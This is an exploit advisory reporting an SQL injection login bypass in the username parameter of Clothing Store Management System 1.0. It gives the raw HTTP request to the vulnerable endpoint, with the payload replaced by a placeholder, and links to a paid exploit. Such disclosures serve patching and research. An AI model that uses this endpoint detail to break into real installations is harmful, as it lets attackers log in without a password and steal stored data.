# Titles: Clothing Store Management System-1.0 SQLi Bypass Authentication # Author: nu11secur1ty # Date: 04/22/2025 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/14576/clothing-store-management-system-using-phpmysqli-source-code.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter is vulnerable for SQLi-Bypass Authentication vulnerability. The parameter is not sanitizing well. The attacker can get all sensitive information from this system when he attacks it online, He can login super easily WITHOUT PASSWORD - ONLY USER - bypassing, and can crash or get every sensitive information from him! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: - SQLi: ```SQLi POST /clothing/ajax.php?action=login HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=d1n8rpqnj189r1vdlq3g6rdsk4 Content-Length: 44 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/clothing/login.php Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive username=the_exploit_here&password= ``` # Reproduce: [href](https://www.patreon.com/posts/clothing-store-1-127189847) # Buy an exploit only: [href](https://satoshidisk.com/pay/COEb97) # Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>